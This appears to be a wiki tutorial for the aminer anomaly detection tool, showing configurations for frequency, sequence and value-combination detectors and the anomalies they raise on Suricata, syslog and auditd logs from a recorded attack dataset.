The following code adds the EventFrequencyDetector to the aminer pipeline. The detector is configured to monitor the frequencies of source IP addresses (parameter paths points to the corresponding parser path), i.e., it adds up all occurrences of each IP address within a time window and checks whether the resulting sums are constant over time. The idea behind this is that different IP addresses may be responsible for different amounts of alerts, and monitoring each of them separately allows more precise detection and further immediately shows the analyst which IP address is connected to an anomaly if on of the monitored sums is suspiciously high or low. Note that it would also be possible to use more than a single path here - in this case, the combined occurrences of values would be monitored and counted. If no paths are provided, the aminer counts the number of occurring events, i.e., the number of logs corresponding to particular sets of parser paths.

Since user behavior is relatively unstable over the day (there is usually more activity during the day than the night), the size of the time window is selected to be 86400 seconds (24 hours) so that any daily patterns are evened out. The confidence factor is set to the relatively low value of 0.01 so that only strong anomalies are reported and any fluctuations caused by normal user behavior (i.e., false positives) are less likely to result in anomalies. More precisely, the observed frequencies of values needs to be 1 / 0.01 = 100 times smaller or larger than the expected frequencies to trigger anomalies. More information on the detection technique of the frequency detector can be found in the HowTo: FrequencyDetector).

Analysis:
  - type: 'EventFrequencyDetector'
    paths:
            - '/parser/model/event_type/alert/conn/ip/ipv4/src_ip'
    window_size: 86400
    confidence_factor: 0.01
    learn_mode: True

The ParserCount should also be adapted as follows so that the number of parsed lines from the suricata event logs is correctly displayed.

  - type: 'ParserCount'
    paths: 
      - '/parser/model/event_type_str'

Then, run the aminer and wait until all lines have been processed, i.e., the number of currently processed lines reported by the ParserCount reaches 0. Stop the aminer so that all models are persisted and then check the occurrence sums learned by the frequency detector with the command cat /var/lib/aminer/EventFrequencyDetector/Default. The result is as follows:

[[["string:3232238270"], 21], [["string:3232238318"], 5]]

This means that in the last time window, two different IP addresses (stored in decimal notation) were observed causing alerts: IP 192.168.10.190 occurred with 21 alerts and IP 192.168.10.238 occurred with 5 alerts. Now, switch the input log file to eve_01 and set the learn_mode of the frequency detector to False before starting the aminer again. Ignore the anomalies reported by the unparsed detector and look out for anomalies from the frequency detector, which should look as follows.

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 3,
    "AnalysisComponentType": "EventFrequencyDetector",
    "AnalysisComponentName": "EventFrequencyDetector3",
    "Message": "Frequency anomaly detected",
    "PersistenceFileName": "Default",
    "AffectedLogAtomPaths": [
      "/parser/model/event_type/alert/conn/ip/ipv4/src_ip"
    ],
    "AffectedLogAtomValues": [
      "3232238318"
    ]
  },
  "FrequencyData": {
    "ExpectedLogAtomValuesFrequency": 5,
    "LogAtomValuesFrequency": 6431,
    "ConfidenceFactor": 0.01,
    "Confidence": 0.9992225159384233
  },
  "LogData": {
    "RawLogData": [
      "{\"timestamp\":\"2020-03-05T08:28:49.752121+0000\",\"flow_id\":6836384253615,\"in_iface\":\"eth0\",\"event_type\":\"alert\",\"src_ip\":\"192.168.10.190\",\"src_port\":49130,\"dest_ip\":\"192.168.10.154\",\"dest_port\":80,\"proto\":\"TCP\",\"tx_id\":0,\"alert\":{\"action\":\"allowed\",\"gid\":1,\"signature_id\":2012887,\"rev\":3,\"signature\":\"ET POLICY Http Client Body contains pass= in cleartext\",\"category\":\"Potential Corporate Privacy Violation\",\"severity\":1},\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/login.php\",\"http_user_agent\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\",\"http_content_type\":\"text\\/html\",\"http_refer\":\"http:\\/\\/mail.cup.com\\/login.php\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":302,\"redirect\":\"\\/services\\/portal\\/\",\"length\":20}}"
    ],
    "Timestamps": [
      1583396929.75
    ],
    "DetectionTimestamp": 1616658696.46,
    "LogLinesCount": 1
  }
}

The anomaly shows that IP address 192.168.10.238 (denoted in decimal notation as 3232238318 in the field AffectedLogAtomValues) occurred 6431 times in the monitored time window, largely exceeding the expected amount of 5 occurrences and also the limit for reporting, 5 * 100 = 500 occurrences. Since this deviation is relatively large, the computed confidence of the anomaly is also relatively high around 0.999. The high increase of alerts is caused by the vulnerability scan that generates a large number of suspicious lines within a short period of time. While alerts occur regularly, this burst of alerts is particularly suspicious and thus correctly detected an anomaly. However, it is important to point out that this is just an exemplary use of the frequency detector - all values or value combinations that occur with regular frequencies are well suited to be monitored with this detector. In addition, it is also possible to monitor the occurrence frequencies of events rather than values by omitting the paths parameter. Working with events rather than values is demonstrated in the following section.

Messages log file

The messages log file contains diverse events, including error messages, information on sent mails between users, login and logout events, etc. A closer look shows that some of the messages appear in particular constellations: A user logging in usually two consecutive events by the horde and imp service, error messages usually occur in specific batches, and so on. Even though some of these events are sometimes interleaving, it is possible to learn the sequences of event occurrences and use this information for anomaly detection. In this section, the sequence detector is used for this purpose.

Try it out: Split messages log file into training and test files

First, generate a training and test file using the following commands. The training file is named messages_00 and the test file is named messages_01, comprising 11299 lines.

cd /home/ubuntu/data/mail.cup.com
split -d -l 22968 messages messages_

Try it out: Run aminer on messages log file with the sequence detector

Messages are logged in the same syntax as syslog. Accordingly, the SyslogParsingModel that comes predefined with the aminer can be used for parsing. Add the model as follows and make sure that the path to the input file is correctly set to the location of messages_00.

Parser:
  - id: 'syslogModel'
    type: SyslogParsingModel
    name: 'syslog'
    args: 'syslog'

  - id: 'startModel'
    start: True
    type: SequenceModelElement
    name: 'parser'
    args: 
      - syslogModel

Then, add the sequence detector as follows. Note that the length of the sequences to be learned is set to 3, which means that the event types of 3 consecutive messages are analyzed. In case that these 3 types have not been observed before in that order, the learned model is adapted or anomalies are reported. For for information on the sequence detector, check out the HowTo: SequenceDetector).

Analysis:
  - type: 'EventSequenceDetector'
    seq_len: 3
    learn_mode: True

As before, add the following path to the parser count component to see the number of processed lines from the messages log file.

- type: 'ParserCount'
  paths: 
    - '/parser/model/host'

Then, run the aminer and wait until all lines are processed. During training, the aminer should already report a number of anomalies from the sequence detector. The reason for this is that in the beginning, no sequences are known and every newly observed sequence triggers an anomaly when being added to the learned model. After some time, the number of reported anomalies should stabilize and fewer anomalies should be reported. Once the training phase is complete, switch to the messages_01 input file and set the learn_mode of the sequence detector to False. Run the aminer again and review the generated anomalies. Some false positives are generated, which can be explained by the fact that the generation of these messages is not fully deterministic, and the training phase thus does not cover all possible sequences that can occur during normal behavior. However, the most anomalies are generated around 19:15-19:30 and correspond to certain steps of the attack. For example, consider the following anomaly.

{
  "AnalysisComponent": {
    "AnalysisComponentIdentifier": 3,
    "AnalysisComponentType": "EventSequenceDetector",
    "AnalysisComponentName": "EventSequenceDetector3",
    "Message": "New sequence detected",
    "PersistenceFileName": "Default",
    "AffectedLogAtomPaths": [
      [
        "/parser",
        "/parser/model",
        "/parser/model/time",
        "/parser/model/sp1",
        "/parser/model/host",
        "/parser/model/service/horde",
        "/parser/model/service/horde/horde_str",
        "/parser/model/service/horde/horde/imp",
        "/parser/model/service/horde/to_str",
        "/parser/model/service/horde/pid",
        "/parser/model/service/horde/line_str",
        "/parser/model/service/horde/line",
        "/parser/model/service/horde/of_str",
        "/parser/model/service/horde/path",
        "/parser/model/service/horde/brack_str",
        "/parser/model/service/horde/horde/imp/succ_str",
        "/parser/model/service/horde/horde/imp/imp/auth_failed",
        "/parser/model/service/horde/horde/imp/imp/auth_failed/auth_failed_str"
      ],
      [
        "/parser",
        "/parser/model",
        "/parser/model/time",
        "/parser/model/sp1",
        "/parser/model/host",
        "/parser/model/service/horde",
        "/parser/model/service/horde/horde_str",
        "/parser/model/service/horde/horde/imp",
        "/parser/model/service/horde/to_str",
        "/parser/model/service/horde/pid",
        "/parser/model/service/horde/line_str",
        "/parser/model/service/horde/line",
        "/parser/model/service/horde/of_str",
        "/parser/model/service/horde/path",
        "/parser/model/service/horde/brack_str",
        "/parser/model/service/horde/horde/imp/succ_str",
        "/parser/model/service/horde/horde/imp/imp/login_failed",
        "/parser/model/service/horde/horde/imp/imp/login_failed/succ_str",
        "/parser/model/service/horde/horde/imp/imp/login_failed/user",
        "/parser/model/service/horde/horde/imp/imp/login_failed/brack_str1",
        "/parser/model/service/horde/horde/imp/imp/login_failed/ip",
        "/parser/model/service/horde/horde/imp/imp/login_failed/to_str",
        "/parser/model/service/horde/horde/imp/imp/login_failed/imap_addr",
        "/parser/model/service/horde/horde/imp/imp/login_failed/brack_str2"
      ],
      [
        "/parser",
        "/parser/model",
        "/parser/model/time",
        "/parser/model/sp1",
        "/parser/model/host",
        "/parser/model/service/horde",
        "/parser/model/service/horde/horde_str",
        "/parser/model/service/horde/horde/imp",
        "/parser/model/service/horde/to_str",
        "/parser/model/service/horde/pid",
        "/parser/model/service/horde/line_str",
        "/parser/model/service/horde/line",
        "/parser/model/service/horde/of_str",
        "/parser/model/service/horde/path",
        "/parser/model/service/horde/brack_str",
        "/parser/model/service/horde/horde/imp/succ_str",
        "/parser/model/service/horde/horde/imp/imp/auth_failed",
        "/parser/model/service/horde/horde/imp/imp/auth_failed/auth_failed_str"
      ]
    ]
  },
  "LogData": {
    "RawLogData": [
      "Mar  4 19:27:08 mail HORDE: [imp] [login] Authentication failed. [pid 6742 on line 730 of \"/var/www/mail.cup.com/imp/lib/Imap.php\"]"
    ],
    "Timestamps": [
      1583350028
    ],
    "DetectionTimestamp": 1616596765.5,
    "LogLinesCount": 1
  }
}

The AffectedLogAtomPaths show that the involved event types all correspond to authentication failures and failed login events. Since login failures are rather uncommon, this sequence of back-to-back failed login attempts never occurred in the training phase. However, the brute-force login attack step caused several login failures within a short period of time and thus generated this new sequence, which was correctly detected by the sequence detector.

Note that in addition to analyzing event type sequences, it is also possible to analyze sequences of values or value combinations. Just as for the frequency detector, this depends on the presence of the paths parameter of the sequence detector configuration. This is more thoroughly demonstrated in the HowTo: SequenceDetector).

Audit logs

The Audit logs, produced by the Audit daemon auditd, contain a high number of categorical values structured as key-value pairs. A closer investigation of the log lines shows that most of the occurrences of these values are highly dependent on each other, i.e., there are groups of values that frequently occur together. Log events with such a structure and behavior are usually promising candidates for value combination detection. When determining the parser paths to be monitored, it is important to (i) only select paths where values have some kind of dependency or relationship to each other, (ii) no random or continuously changing values are selected, e.g., process IDs (pid in Audit logs), because they do not provide any benefit for detection and yield many false positives, and (iii) avoid paths with extremely large numbers of possible values, e.g., function parameters (a1, a2, a3, etc. in Audit logs), because they result in extremely large persistency sizes. In the following, the combination of syscall type (syscall), user ID (uid), and command information (comm and exe) are selected, because as a group they provide the information which entity executed a particular action and how it was handled by the system.

Try it out: Split Audit logs into training and test files

Note that due to their large size, the Audit logs are zip-archived in the AIT-LDSv1.1 and first have to be extracted manually. After extraction, generate a training and test file by using the following commands:

cd /home/ubuntu/data/mail.cup.com/audit
split -d -l 81934700 audit.log audit_

This generates the training file audit_00 and the test file audit_01 with 41.694.466 lines. Note that Audit log files are extremely large and thus all operations on that data, including running the aminer, take considerably more time than for other data sets.

Try it out: Run aminer on Audit logs with combo detector

Open the configuration and set the correct input file path pointing to the audit_00 file. Similar to the exim mainlog, it is necessary to append an appropriate parsing model to the configuration so that audit logs can be parsed. In particular, add the AuditdParsingModel with the following code:

Parser:
  - id: 'apacheAccessModel'
    type: ApacheAccessParsingModel
    name: 'apacheAccess'
    args: 'apacheAccess'

  - id: 'eximModel'
    type: EximParsingModel
    name: 'exim'
    args: 'exim'

  - id: 'auditModel'
    type: AuditdParsingModel
    name: 'audit'
    args: 'audit'
    
  - id: 'START'
    start: True
    type: FirstMatchModelElement
    name: 'parser'
    args:
      - apacheAccessModel
      - eximModel
      - auditModel

Then add the combination detector to the list of analysis components as follows:

Analysis:
  - type: 'NewMatchPathValueComboDetector'
    paths:
      - '/parser/model/type/syscall/syscall'
      - '/parser/model/type/syscall/uid'
      - '/parser/model/type/syscall/comm'
      - '/parser/model/type/syscall/exe'
    learn_mode: True
    persistence_id: 'audit_syscall_uid_comm_exe'
    output_logline: False
    allow_missing_values: False

Note that the learn_mode parameter is set to True. It is not necessary to comment out or delete the other existing detectors, unless other input files additional to the Audit logs are used and the output should not be affected by them. Just as for the Exim parsing model, add the Audit parsing model of type AuditdParsingModel to the configuration and also append it to the root node. The parser count analysis component should also be extended to show the number of parsed lines from the Audit files. To do this, add the following path.

- type: 'ParserCount'
  paths: 
    - '/parser/model/type_str' # Audit

Start the aminer and wait until the training logs have been parsed. Then, open the persistency of the combo detector to review the learned combinations.

sudo vim /var/lib/aminer/NewMatchPathValueComboDetector/audit_syscall_uid_comm_exe

A short selection of all learned value combinations is shown in the following:

[1, "bytes:0", "bytes:\"apache2\"", "bytes:\"/bin/dash\""],
[2, "bytes:0", "bytes:\"auth\"", "bytes:\"/usr/lib/dovecot/auth\""], 
[42, "bytes:0", "bytes:\"(md.daily)\"", "bytes:\"/lib/systemd/systemd\""], 
[42, "bytes:0", "bytes:\"cron\"", "bytes:\"/usr/sbin/cron\""],
[59, "bytes:0", "bytes:\"sh\"", "bytes:\"/bin/dash\""]

For the detection, change the input file path to the test file audit_01, set the learn_mode parameter of the NewMatchPathValueComboDetector for audit data to False, and restart the aminer. Many anomalies should be detected, including the following:

"AffectedLogAtomValues": [
  "59",
  "33",
  "\"netcat\"",
  "\"/bin/nc.traditional\""
],
"RawLogData": [
  "type=SYSCALL msg=audit(1583350370.206:45582192): 
    arch=c000003e syscall=59 success=yes exit=0 a0=557558e14468 
    a1=557558158c30 a2=557558e14408 a3=7f53bebf4750 items=2 
    ppid=8773 pid=8774 auid=4294967295 uid=33 gid=33 euid=33 
    suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) 
    ses=4294967295 comm=\"netcat\" exe=\"/bin/nc.traditional\" 
    key=(null)"
]

As visible in the AffectedLogAtomValues, this anomaly shows an execution of the netcat tool by user 33, which is part of the Horde exploit attack step. Since these values did not occur in the training data, the anomaly was raised by the combination detector. However, closer investigation shows that the netcat command was never executed by any user in the training file, and thus it is also possible to detect the line with a simple value detector monitoring that parser path. However, there also exist cases where only the combination of values is able to correctly differentiate normal and anomalous behavior. For example, consider the following anomaly raised by the combo detector:

"AffectedLogAtomValues": [
  "1",
  "0",
  "\"sh\"",
  "\"/bin/dash\""
],
"RawLogData": [
  "type=SYSCALL msg=audit(1583350659.428:45636740): 
    arch=c000003e syscall=1 success=yes exit=17 a0=1 
    a1=5562cb5b3410 a2=11 a3=73 items=0 ppid=8963 pid=8964 
    auid=4294967295 uid=0 gid=113 euid=0 suid=0 fsuid=0 egid=113 
    sgid=113 fsgid=113 tty=(none) ses=4294967295 comm=\"sh\" 
    exe=\"/bin/dash\" key=(null)"
]

Note that each of the AffectedLogAtomValues individually has already been observed in the training log file, as visible in the sample selection of persisted value combinations from before. Nevertheless, the anomaly was raised since these values never occurred together in a line, which correctly discloses an anomaly that is part of the Exim exploit attack step.

This concludes the aminer try-it-out. The final configuration that was incrementally built in this try-it-out is provided in the following.

LearnMode: True
AminerUser: 'aminer'
AminerGroup: 'aminer'

LogResourceList:
        #- 'file:///home/ubuntu/data/mail.cup.com-train/daemon.log'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/auth.log'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/suricata/eve.json'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/suricata/fast.log'
        - 'file:///home/ubuntu/data/mail.cup.com-test/apache2/mail.cup.com-access.log'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/apache2/mail.cup.com-error.log'
        #- 'file:///home/ubuntu/data/mail.cup.com-test/exim4/mainlog'
        #- 'file:///home/ubuntu/data/mail.cup.com-train/syslog'
        #- 'file:///home/ubuntu/data/mail.cup.com-test/audit/audit.log'

# Read and store information to be used between multiple invocations
# of aminer in this directory. The directory must only be accessible
# to the 'AminerUser' but not group/world readable. On violation,
# aminer will refuse to start. When undefined, '/var/lib/aminer'
# is used.
# Core.PersistenceDir: '/tmp/lib/aminer'

# Define a target e-mail address to send alerts to. When undefined,
# no e-mail notification hooks are added.
# MailAlerting.TargetAddress: 'root@localhost'

# Sender address of e-mail alerts. When undefined, "sendmail"
# implementation on host will decide, which sender address should
# be used.
# MailAlerting.FromAddress: 'root@localhost'

# Define, which text should be prepended to the standard aminer
# subject. Defaults to "aminer Alerts:"
# MailAlerting.SubjectPrefix: 'aminer Alerts:'

# Define a grace time after startup before aminer will react to
# an event and send the first alert e-mail. Defaults to 0 (any
# event can immediately trigger alerting).
# MailAlerting.AlertGraceTime: 0

# Define how many seconds to wait after a first event triggered
# the alerting procedure before really sending out the e-mail.
# In that timespan, events are collected and will be sent all
# using a single e-mail. Defaults to 10 seconds.
# MailAlerting.EventCollectTime: 10

# Define the minimum time between two alert e-mails in seconds
# to avoid spamming. All events during this timespan are collected
# and sent out with the next report. Defaults to 600 seconds.
# MailAlerting.MinAlertGap: 600

# Define the maximum time between two alert e-mails in seconds.
# When undefined this defaults to "MailAlerting.MinAlertGap".
# Otherwise this will activate an exponential backoff to reduce
# messages during permanent error states by increasing the alert
# gap by 50% when more alert-worthy events were recorded while
# the previous gap time was not yet elapsed.
# MailAlerting.MaxAlertGap: 600

# Define how many events should be included in one alert mail
# at most. This defaults to 1000
# MailAlerting.MaxEventsPerMessage: 1000

# Configure the logline prefix
# LogPrefix: ''

Parser:
        - id: 'auditModel'
          type: AuditdParsingModel
          name: 'audit'
          args: 'audit'

        - id: 'suricataEventModel'
          type: SuricataEventParsingModel
          name: 'suricataEvent'
          args: 'suricataEvent'

        - id: 'syslogModel'
          type: SyslogParsingModel
          name: 'syslog'
          args: 'syslog'

        - id: 'apacheAccessModel'
          type: ApacheAccessParsingModel
          name: 'apacheAccess'
          args: 'apacheAccess'

        - id: 'apacheErrorModel'
          type: ApacheErrorParsingModel
          name: 'apacheError'
          args: 'apacheError'

        - id: 'eximModel'
          type: EximParsingModel
          name: 'exim'
          args: 'exim'

        - id: 'suricataFastModel'
          type: SuricataFastParsingModel
          name: 'suricataFast'
          args: 'suricataFast'

        - id: 'START'
          start: True
          type: FirstMatchModelElement
          name: 'parser'
          args:
            - auditModel
            - suricataEventModel
            - syslogModel
            - apacheAccessModel
            - apacheErrorModel
            - eximModel
            - suricataFastModel

Input:
        multi_source: True
        timestamp_paths: 
          - '/parser/model/time'
          - '/parser/model/type/execve/time'
          - '/parser/model/type/proctitle/time'
          - '/parser/model/type/syscall/time'
          - '/parser/model/type/path/time'
          - '/parser/model/type/login/time'
          - '/parser/model/type/sockaddr/time'
          - '/parser/model/type/unknown/time'
          - '/parser/model/type/cred_refr/time'
          - '/parser/model/type/user_start/time'
          - '/parser/model/type/user_acct/time'
          - '/parser/model/type/user_auth/time'
          - '/parser/model/type/cred_disp/time'
          - '/parser/model/type/service_start/time'
          - '/parser/model/type/service_stop/time'
          - '/parser/model/type/user_end/time'
          - '/parser/model/type/cred_acq/time'
          - '/parser/model/type/user_bprm_fcaps/time'


Analysis:
         - type: 'ParserCount'
           paths:
            - '/parser/model/type_str' # Audit
            - '/parser/model/status_code' # Apache Access
            - '/parser/model/php' # Apache Error
            - '/parser/model/sp' # Exim
            - '/parser/model/event_type_str' # Suricata Event
            - '/parser/model/classification' # Suricata Fast
            - '/parser/model/host' # Syslog
           report_interval: 10

         - type: 'NewMatchPathValueDetector'
           paths: ['/parser/model/status_code']
           persistence_id: 'accesslog_status'
           output_logline: False
           learn_mode: True

         - type: 'NewMatchPathValueComboDetector'
           paths: ['/parser/model/fm/request/method', '/parser/model/combined/combined/user_agent']
           persistence_id: 'accesslog_request_agent'
           output_logline: False
           allow_missing_values: False
           learn_mode: True

         # commented analysis components
         #- type: 'EventCorrelationDetector'
         #  paths: ['/parser/model/fm/request/method', '/parser/model/fm/request/request']
         #  max_observations: 200
         #  hypothesis_max_delta_time: 10.0
         #  hypotheses_eval_delta_time: 28800.0
         #  delta_time_to_discard_hypothesis: 28800.0
         #  p0: 0.95
         #  alpha: 0.05
         #  check_rules_flag: False
         #  persistence_id: 'accesslog_method_request'
         #  learn_mode: True

         #- type: 'NewMatchPathValueComboDetector'
         #  paths: ['/parser/model/type/syscall/syscall', '/parser/model/type/syscall/uid', '/parser/model/type/syscall/comm', '/parser/model/type/syscall/exe']
         #  learn_mode: False
         #  persistence_id: 'audit_syscall_uid_comm_exe'
         #  output_logline: False
         #  allow_missing_values: False

EventHandlers:
        - id: 'stpe'
          json: True # optional default: False
          type: 'StreamPrinterEventHandler'
Clone this wiki locally